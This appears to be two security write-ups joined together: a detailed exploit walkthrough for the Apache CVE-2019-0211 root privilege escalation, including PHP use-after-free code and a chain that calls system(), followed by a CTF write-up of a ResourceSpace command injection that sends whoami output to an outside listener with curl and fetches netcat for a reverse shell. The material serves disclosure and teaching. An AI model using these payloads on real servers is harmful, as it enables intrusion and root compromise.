1. Obtain R/W access on a worker process

PHP UAF 0-day

Since mod_prefork is often used in combination with mod_php, it seems natural to exploit the vulnerability through PHP. CVE-2019-6977 would be a perfect candidate, but it was not out when I started writing the exploit. I went with a 0day UAF in PHP 7.x (which seems to work in PHP5.x as well):

PHP UAF

<?php

class X extends DateInterval implements JsonSerializable
{
  public function jsonSerialize()
  {
    global $y, $p;
    unset($y[0]);
    $p = $this->y;
    return $this;
  }
}

function get_aslr()
{
  global $p, $y;
  $p = 0;

  $y = [new X('PT1S')];
  json_encode([1234 => &$y]);
  print("ADDRESS: 0x" . dechex($p) . "\n");

  return $p;
}

get_aslr();

This is a UAF on a PHP object: we unset $y[0] (an instance of X), but it is still usable via $this.

UAF to Read/Write

We want to achieve two things:

  • Read memory to find all_buckets' address
  • Edit the SHM to change the bucket index and add our custom mutex structure

Luckily for us, PHP’s heap is located before those two in memory.

Memory addresses of PHP’s heap, ap_scoreboard_image->* and all_buckets

root@apaubuntu:~# cat /proc/6318/maps | grep libphp | grep rw-p
7f4a8f9f3000-7f4a8fa0a000 rw-p 00471000 08:02 542265 /usr/lib/apache2/modules/libphp7.2.so

(gdb) p *ap_scoreboard_image 
$14 = {
  global = 0x7f4a9323e008, 
  parent = 0x7f4a9323e020, 
  servers = 0x55835eddea78
}
(gdb) p all_buckets 
$15 = (prefork_child_bucket *) 0x7f4a9336b3f0

Since we’re triggering the UAF on a PHP object, any property of this object will be UAF’d too; we can convert this zend_object UAF into a zend_string one. This is useful because of zend_string‘s structure:

(gdb) ptype zend_string
type = struct _zend_string {
    zend_refcounted_h gc;
    zend_ulong h;
    size_t len;
    char val[1];
}

The len property contains the length of the string. By incrementing it, we can read and write further in memory, and therefore access the two memory regions we’re interested in: the SHM and Apache’s all_buckets.

Locating bucket indexes and all_buckets

We want to change ap_scoreboard_image->parent[worker_id]->bucket for a certain worker_id. Luckily, the structure always starts at the beginning of the shared memory block, so it is easy to locate.

Shared memory location and targeted process_score structures

root@apaubuntu:~# cat /proc/6318/maps | grep rw-s
7f4a9323e000-7f4a93252000 rw-s 00000000 00:05 57052                      /dev/zero (deleted)

(gdb) p &ap_scoreboard_image->parent[0]
$18 = (process_score *) 0x7f4a9323e020
(gdb) p &ap_scoreboard_image->parent[1]
$19 = (process_score *) 0x7f4a9323e044

To locate all_buckets, we can make use of our knowledge of the prefork_child_bucket structure. We have:

Important structures of bucket items

prefork_child_bucket {
    ap_pod_t *pod;
    ap_listen_rec *listeners;
    apr_proc_mutex_t *mutex; <--
}

apr_proc_mutex_t {
    apr_pool_t *pool;
    const apr_proc_mutex_unix_lock_methods_t *meth; <--
    int curr_locked;
    char *fname;

    ...
}

apr_proc_mutex_unix_lock_methods_t {
    unsigned int flags;
    apr_status_t (*create)(apr_proc_mutex_t *, const char *);
    apr_status_t (*acquire)(apr_proc_mutex_t *);
    apr_status_t (*tryacquire)(apr_proc_mutex_t *);
    apr_status_t (*release)(apr_proc_mutex_t *);
    apr_status_t (*cleanup)(void *);
    apr_status_t (*child_init)(apr_proc_mutex_t **, apr_pool_t *, const char *); <--
    apr_status_t (*perms_set)(apr_proc_mutex_t *, apr_fileperms_t, apr_uid_t, apr_gid_t);
    apr_lockmech_e mech;
    const char *name;
}

all_buckets[0]->mutex will be located in the same memory region as all_buckets[0]. Since meth is a static structure, it will be located in libapr‘s .data. Since meth points to functions defined in libapr, each of the function pointers will be located in libapr‘s .text.

Since we have knowledge of those regions' addresses through /proc/self/maps, we can go through every pointer in Apache's memory and find one that matches the structure. It will be all_buckets[0].

As I mentioned, all_buckets‘s address changes at every graceful restart. This means that when our exploit triggers, all_buckets‘s address will be different than the one we found. This has to be taken into account; we’ll talk about this later.

2. Write a fake prefork_child_bucket structure in the SHM

Reaching the function call

The code path to the arbitrary function call is the following:

bucket_id = ap_scoreboard_image->parent[id]->bucket
my_bucket = all_buckets[bucket_id]
mutex = &my_bucket->mutex
apr_proc_mutex_child_init(mutex)
(*mutex)->meth->child_init(mutex, pool, fname)
Call:reach

Calling something proper

To exploit, we make (*mutex)->meth->child_init point to zend_object_std_dtor(zend_object *object), which yields the following chain:

mutex = &my_bucket->mutex
[object = mutex]

zend_object_std_dtor(object)
    ht = object->properties
    zend_array_destroy(ht)
    zend_hash_destroy(ht)
    val = &ht->arData[0]->val
    ht->pDestructor(val)

pDestructor is set to system, and &ht->arData[0]->val is a string.

Call:exec

As you can see, both leftmost structures are superimposed.

3. Make all_buckets[bucket] point to the structure

Problem and solution

Right now, if all_buckets‘ address was unchanged in between restarts, our exploit would be over:

  • Get R/W over all memory after PHP’s heap
  • Find all_buckets by matching its structure
  • Put our structure in the SHM
  • Change one of the process_score.bucket in the SHM so that all_bucket[bucket]->mutex points to our payload

As all_buckets‘ address changes, we can do two things to improve reliability: spray the SHM and use every process_score structure — one for each PID.

Spraying the shared memory

If all_buckets' new address is not far from the old one, my_bucket will point close to our structure. Therefore, instead of placing our prefork_child_bucket structure at one precise spot in the SHM, we can spray it all over the unused parts of the SHM. The problem is that the structure is also used as a zend_object, and therefore it has a size of (5 * 8 =) 40 bytes to include zend_object.properties. Spraying a structure that big over a space this small won't help us much. To solve this problem, we superimpose the two center structures, apr_proc_mutex_t and zend_array, and spray their address over the rest of the shared memory. The effect is that prefork_child_bucket.mutex and zend_object.properties point to the same address. Now, if all_buckets is relocated not too far from its original address, my_bucket will land in the sprayed area.

Call:exec

Using every process_score

Each Apache worker has an associated process_score structure, and with it a bucket index. Instead of changing one process_score.bucket value, we can change every one of them, so that they cover another part of memory. For instance:

ap_scoreboard_image->parent[0]->bucket = -10000 -> 0x7faabbcc00 <= all_buckets <= 0x7faabbdd00
ap_scoreboard_image->parent[1]->bucket = -20000 -> 0x7faabbdd00 <= all_buckets <= 0x7faabbff00
ap_scoreboard_image->parent[2]->bucket = -30000 -> 0x7faabbff00 <= all_buckets <= 0x7faabc0000

This multiplies our success rate by the number of Apache workers. Upon respawn, only one worker will have a valid bucket number, but this is not a problem because the others will crash and immediately respawn.

Success rate

Different Apache servers have different numbers of workers. Having more workers means we can spray the address of our mutex over less memory, but it also means we can specify more indexes for all_buckets. So having more workers improves our success rate. After a few tries on my test Apache server with 4 workers (the default), I had an ~80% success rate. The success rate jumps to ~100% with more workers.

Again, if the exploit fails, it can be restarted the next day as Apache will still restart properly. Apache's error.log will nevertheless contain notifications about its workers segfaulting.

4. Await 6:25AM for the exploit to trigger

Well, that’s the easy step.

Vulnerability timeline

  • 2019-02-22 Initial contact email to security[at]apache[dot]org, with description and POC
  • 2019-02-25 Acknowledgment of the vulnerability, working on a fix
  • 2019-03-07 Apache's security team sends a patch for me to review, CVE assigned
  • 2019-03-10 I approve the patch
  • 2019-04-01 Apache HTTP version 2.4.39 released

Apache’s team has been prompt to respond and patch, and nice as hell. Really good experience. PHP never answered regarding the UAF.

Questions

Why the name ?

CARPE: stands for CVE-2019-0211 Apache Root Privilege Escalation
DIEM: the exploit triggers once a day

I had to.

Can the exploit be improved ?

Yes. For instance, my computations for the bucket indexes are shaky. This is between a POC and a proper exploit. BTW, I added tons of comments, it is meant to be educational as well.

Does this vulnerability target PHP ?

No. It targets the Apache HTTP server.

Exploit

The exploit is available here.

Insomni’Hack Teaser 2019 — exploit-space

Original text by @Ghostx_0

CTF URL: https://teaser.insomnihack.ch/

Solves: 7 / Points: 500 / Category: Web

Challenge description

We have created a little exploit space and made it accessible for everyone! Have fun! You can get your own exploit space here.

Challenge resolution

This challenge was the most realistic yet fun web challenge of this Insomni’Hack teaser, as it presented nothing less than an installation of the ResourceSpace open source digital asset management software.

The first step, like for any challenge, was the reconnaissance phase.

As indicated in the commented HTML code, the installed version of ResourceSpace was 8.6.12117:

ResourceSpace Version

This software being open source, we can audit its source code in order to find vulnerabilities we can exploit.

We can then look at the Git commit logs to find juicy commit messages like this one:

Commit logs

Looking at the diff view for this commit reveals the vulnerable entry point: user input in the "/plugins/pdf_split/pages/pdf_split.php" page is passed to the run_command() function:

Git diff

The fix introduced by this commit just sanitizes the user inputs by applying the escapeshellarg() function:

escapeshellarg function

Using the semi-colon character thus terminates the command line, allowing us to execute arbitrary commands on the web server. However, as we don't have directly visible output, we need an HTTP server such as the Burp Collaborator listening for incoming requests.

The following POST request uses the curl binary in order to send the result of the whoami command to our web server:

POST request whoami
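
(The screenshot is not reproduced here. Conceptually, the injected request looked something like the sketch below; the host, session cookie and parameter names are hypothetical placeholders, the real ones come from pdf_split.php.)

import requests

# A semicolon terminates the command that run_command() builds, and the appended
# curl call ships the output of whoami to the Burp Collaborator listener.
collab = "https://xxxxxxxx.burpcollaborator.net"        # attacker-controlled listener
payload = f";curl {collab}/$(whoami)"

requests.post(
    "https://challenge-host.example/plugins/pdf_split/pages/pdf_split.php",
    cookies={"session": "<valid session>"},              # hypothetical authenticated session
    data={"ref": "1", "pdf_pages": payload},             # hypothetical parameter names
)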

Immediately after, we see the result of our command in our Burp collaborator interactions panel:

whoami

The final step is to locate and get the flag:

POST request getflag

Wait… What? There’s a captcha that prevents non-interactive access:

captcha

We actually need to obtain an interactive reverse shell on this server.

To do so we can download the netcat binary from our web server using curl, add execution permission and run it:

reverse shell 1

As expected, the web server just connects back to our server, therefore providing us with an interactive reverse shell:

reverse shell 2

And finally we can solve the captcha and get the flag:

flag